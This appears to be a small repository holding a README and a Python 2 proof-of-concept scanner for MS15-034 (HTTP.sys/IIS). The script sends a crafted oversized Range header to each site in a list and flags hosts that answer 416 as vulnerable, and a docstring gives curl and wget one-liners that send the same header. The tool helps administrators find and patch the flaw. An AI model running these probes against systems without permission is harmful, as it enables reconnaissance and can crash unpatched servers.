├── README.md └── http-sys.py /README.md: -------------------------------------------------------------------------------- 1 | This is a test POC for: 2 | MS15-034: HTTP.sys (IIS) DoS And Possible Remote Code Execution. 3 | By Ebrahim Hegazy @Zigoo0 4 | 5 | To start using the tool, just create list.txt file, and add all the sites you want to test to that file. 6 | And you are ready to go :) 7 | 8 | the tool is written in python, if you don't have python installed, you can download it from: python.org 9 | 10 | Once it's installed, Start the tool, enter list.txt and the tool will handle the rest :-) 11 | 12 | Features: 13 | 14 | 1- Can scan Multiple sites. 15 | 16 | 2- Supports SSL 17 | 18 | 3- Super User Friendly :D 19 | -------------------------------------------------------------------------------- /http-sys.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import requests 3 | 4 | """ 5 | @Zigoo0 6 | Another testing methods. 7 | curl -v [ipaddress]/ -H "Host: test" -H "Range: bytes=0-18446744073709551615" 8 | wget -O /dev/null --header="Range: 0-18446744073709551615" http://[ip address]/ 9 | """ 10 | # Coloring class 11 | class colors: 12 | def __init__(self): 13 | self.green = "\033[92m" 14 | self.blue = "\033[94m" 15 | self.bold = "\033[1m" 16 | self.yellow = "\033[93m" 17 | self.red = "\033[91m" 18 | self.end = "\033[0m" 19 | color = colors() 20 | 21 | banner = color.green+''' 22 | This is a test POC for: 23 | MS15-034: HTTP.sys (IIS) DoS And Possible Remote Code Execution. 24 | By Ebrahim Hegazy @Zigoo0 \n'''+color.end 25 | 26 | print banner 27 | #Reading hosts from a text file to test multiple sites. 28 | hosts = open(raw_input('[*] Enter the name of the list file: ')).readlines() 29 | #Vulnerable hosts will go here. 30 | vulnerable = set() 31 | #Fixed hosts will go here. 32 | fixed = set() 33 | 34 | #Defining the main function. 35 | def main(url): 36 | print color.green+"[*] Testing "+color.end + url 37 | try: 38 | #Defining the Headers. 39 | headers = {"User-Agent": "Mozilla/5.0 (Windows NT 6.2; rv:30.0) Gecko/20150101 Firefox/32.0", 40 | "Accept-Encoding": "gzip, deflate", 41 | "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", 42 | "Range": "bytes=0-18446744073709551615", 43 | "Referer": "https://github.com/zigoo0/", 44 | "Connection": "keep-alive" 45 | } 46 | #Sending the Request. 47 | r = requests.get(url, headers=headers, verify=False, timeout=5) 48 | if r.status_code == 416 or "Requested Range Not Satisfiable" in r.text: 49 | #print r.status_code. 50 | print "[*] %s"%(url) + color.red+" is Vulnerable!\n"+color.end 51 | #Adding the vulnerable hosts to a SET for later use and to make sure it's a unique host. 52 | vulnerable.add(url) 53 | else: 54 | #print r.status_code 55 | print "[*] Seems %s "%(url) + color.green+" is not vulnerable!\n"+color.end 56 | #Adding the non-vulnerable hosts to a SET for later use. 57 | fixed.add(url) 58 | except Exception: 59 | pass 60 | 61 | 62 | if __name__ == "__main__": 63 | for host in hosts: 64 | url = host.strip() 65 | main(url) 66 | #Printing the list of vulnerable sites. 67 | print color.red+"[*] %s found to be vulnerable."%(len(vulnerable)) +color.end 68 | for vuln in vulnerable: 69 | print "[-] ", vuln 70 | #Adding the vulnerable sites to a text file. 71 | vulnz = open('vulnerable-hosts.txt', 'a') 72 | vulnz.write(vuln+"\n") 73 | print color.blue+"[*] Vulnerable hosts added to "+color.end + "vulnerable-hosts.txt" 74 | #Printing the number of fixed/not-vulnerable hosts. 75 | print color.green+"\n[*] %s found to be NOT vulnerable."%(len(fixed)) +color.end 76 | #printing the refferences. 77 | print color.green+"\n[*] Please follow below link for more details about this vulnerabability and How to FIX it."+color.end 78 | print "[*] https://technet.microsoft.com/library/security/ms15-034" 79 | print "[*] https://technet.microsoft.com/en-us/library/security/ms15-apr.aspx" 80 | print color.green+"[*] Don't forget to update your servers.\n"+color.end 81 | 82 | 83 | 84 | 85 | 86 | --------------------------------------------------------------------------------